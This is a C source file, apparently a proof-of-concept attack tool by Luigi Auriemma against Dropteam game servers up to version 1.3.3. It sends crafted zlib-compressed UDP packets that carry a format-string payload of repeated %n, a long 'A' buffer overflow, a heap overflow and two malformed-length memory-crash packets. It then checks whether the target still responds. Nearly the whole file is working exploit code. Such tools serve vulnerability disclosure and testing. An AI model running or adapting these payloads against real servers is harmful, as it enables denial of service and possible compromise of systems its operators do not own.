/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <ctype.h>
#include <time.h>
#include <zlib.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
    #define waitms(x)   sleep(x)
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
    #define stricmp strcasecmp
    #define waitms(x)   sleep(x * 1000)
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        9967
#define BUFFSZ      0xffff



void fgetz(u8 *data, int len);
int unzip(u8 *in, int size, u8 *out, int maxsz);
int zip(u8 *in, int size, u8 *out, int maxsz);
int dtsr(int sd, int *type, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int putss(u8 *buff, u8 *data, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int putpt(u8 *dst, u8 *pat, int len);
int putsx(u8 *dst, u8 *str);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len,
            i,
            type,
            attack;
    u16     port    = PORT,
            num;
    u8      ver[13],
            elem,
            *buff,
            *data,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Dropteam <= 1.3.3 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]>\n"
            "\n"
            "Attacks:\n"
            " 1 = format string through packet 0x01\n"
            " 2 = buffer-overflow through packet 0x5c\n"
            " 3 = heap-overflow through packet 0x18\n"
            " 4 = various memory crash through packet 0x4b\n"
            " 5 = various memory crash through packet 0x4b\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    buff = malloc(BUFFSZ + 3);
    if(!buff) std_err();
    data = buff + 3;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    type = 0x2b;
    p = data;
    len = dtsr(sd, &type, buff, p - data, buff, BUFFSZ, &peer, 1);

    printf("\n"
        "  scenario     %.64s\n"
        "  server name  %.64s\n"
        "  version      %.12s\n"
        "  mod          %.16s\n",
        data + 6,
        data + 6 + 64,
        data + 6 + 64 + 64,
        data + 6 + 64 + 64 + 12);
    strncpy(ver, buff + 1 + 8 + 64 + 64, sizeof(ver));
    ver[sizeof(ver) - 1] = 0;

    p = data;
    if(attack == 1) {
        type = 0x01;

        if(ver[0] >= '1') {
            p += putsx(p, "%n%n%n%n%n");        // account username
            p += putsx(p, "%n%n%n%n%n");        // account password!!!
            p += putsx(p, ver);                 // version
            p += putsx(p, "%n%n%n%n%n");        // name
        } else {
            p += putss(p, "%n%n%n%n%n", 64);
            p += putss(p, "%n%n%n%n%n", 16);
            p += putss(p, ver,          64);
            p += putss(p, "%n%n%n%n%n", 16);
        }
        p += putxx(p, 0,            32);        // zero
        p += putxx(p, 9968,         16);        // client port

    } else if(attack == 2) {
        type = 0x5c;

        p += putxx(p, 0,            32);        // not used
        p += putxx(p, 0,            8);
        p += putxx(p, 0,            16);
        p += putxx(p, 0,            8);
        p += putsx(p,
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 1,            8);         // zero to not handle the following data
        p += putsx(p,
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
        p += putxx(p, 0,            16);
        p += putxx(p, 0,            16);
        p += putxx(p, 0,            8);
        p += putxx(p, 0,            8);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);

    } else if(attack == 3) {
        type = 0x18;

        num = 5000;                             // 4102 is enough
        p += putxx(p, num >> 1,     16);
        for(i = 0; i < num; i++) {
            p += putxx(p, 0x41414141, 32);
        }

    } else if(attack == 4) {
        type = 0x4b;

        elem = 1;
        num  = 0xf200;
        p += putxx(p, 0,            8);
        p += putxx(p, elem,         8);
        for(i = 0; i < elem; i++) {
            p += putxx(p, num,      16);
            p += putpt(p, "A",      num);
        }

    } else if(attack == 5) {
        type = 0x4b;

        p += putxx(p, 0,            8);
        p += putxx(p, 0xff,         8);
        p += putxx(p, 0xffff,       16);

    } else {
        printf("\nError: wrong attack number\n");
        exit(1);
    }

    len = dtsr(sd, &type, buff, p - data, buff, BUFFSZ, &peer, 0);
    close(sd);

    sleep(ONESEC);

    printf("- check server:\n");
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    type = 0x2b;
    p = data;
    len = dtsr(sd, &type, buff, p - data, buff, BUFFSZ, &peer, 0);
    if(len < 0) {
        printf("\n  Server IS vulnerable!!!\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n");
    }
    close(sd);
    return(0);
}



void fgetz(u8 *data, int len) {
    u8      *p;

    fgets(data, len, stdin);
    for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
}



int unzip(u8 *in, int size, u8 *out, int maxsz) {
    z_stream    z;
    int         ret;

    z.zalloc = (alloc_func)0;
    z.zfree  = (free_func)0;
    z.opaque = (voidpf)0;

    if(inflateInit2(&z, 15)) {
        printf("\nError: zlib initialization error\n");
        exit(1);
    }

    z.next_in   = in;
    z.avail_in  = size;
    z.next_out  = out;
    z.avail_out = maxsz;
    inflate(&z, Z_NO_FLUSH);

    ret = z.total_out;
    inflateEnd(&z);
    return(ret);
}



int zip(u8 *in, int size, u8 *out, int maxsz) {
    z_stream    z;
    int         ret;

    z.zalloc = (alloc_func)0;
    z.zfree  = (free_func)0;
    z.opaque = (voidpf)0;

    if(deflateInit2(&z, Z_BEST_COMPRESSION, Z_DEFLATED, 15, 9, Z_DEFAULT_STRATEGY)) {
        printf("\nError: zlib initialization error\n");
        exit(1);
    }

    z.next_in   = in;
    z.avail_in  = size;
    z.next_out  = out;
    z.avail_out = maxsz;
    deflate(&z, Z_FINISH);

    ret = z.total_out;
    deflateEnd(&z);
    return(ret);
}



int dtsr(int sd, int *type, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;
    u8      *zbuff  = NULL;

    if(!zbuff) {
        zbuff = malloc(BUFFSZ);
        if(!zbuff) std_err();
    }

    if(in) {
        putxx(in, *type, 8);
        if(insz > 1) {
            putxx(in + 1, insz, 16);
            insz += 2;
        }
        insz = zip(in, insz + 1, zbuff, BUFFSZ);
        in   = zbuff;
    }

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) goto quit;
        return(0);
    }
    if(in) {
        for(retry = 2; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    len = recvfrom(sd, zbuff, BUFFSZ, 0, NULL, NULL);
    if(len < 0) goto quit;
    len = unzip(zbuff, len, out, outsz);
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



int putss(u8 *buff, u8 *data, int len) {
    strncpy(buff, data, len);
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;

    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }

    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;

    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }

    return(bytes);
}



int putpt(u8 *dst, u8 *pat, int len) {
    int     patlen;
    u8      *p;

    patlen = (*pat) ? strlen(pat) : 1;
    p = dst;

    for(len /= patlen; len; len--) {
        memcpy(p, pat, patlen);
        p += patlen;
    }
    return(p - dst);
}



int putsx(u8 *dst, u8 *str) {
    int     len;

    len = strlen(str);
    if(len > 0xff) {
        printf("\nError: you cannot use a string longer than 255 bytes\n");
        exit(1);
    }
    dst[0] = len;
    memcpy(dst + 1, str, len);
    return(1 + len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


